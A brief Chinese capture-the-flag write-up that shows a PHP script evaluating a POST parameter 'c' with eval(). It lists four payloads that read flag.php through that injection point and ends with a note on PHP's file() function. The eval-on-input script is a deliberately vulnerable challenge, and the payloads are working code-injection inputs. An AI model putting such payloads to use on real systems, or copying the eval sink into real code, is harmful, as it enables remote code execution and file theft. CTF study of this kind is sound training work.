源码分析:
<?php
// flag in flag.php
if(isset($_POST['c']))
{ $c= $_POST['c'];
eval($c);
}
else
{
highlight_file(__FILE__);
}
payload:
在POST处进行传参
c=var_dump(file('flag.php'));
c=readfile('flag.php');
c=print_r(file('flag.php'));
c=echo file_get_contents('flag.php');
知识点:
file — 把整个文件读入一个数组中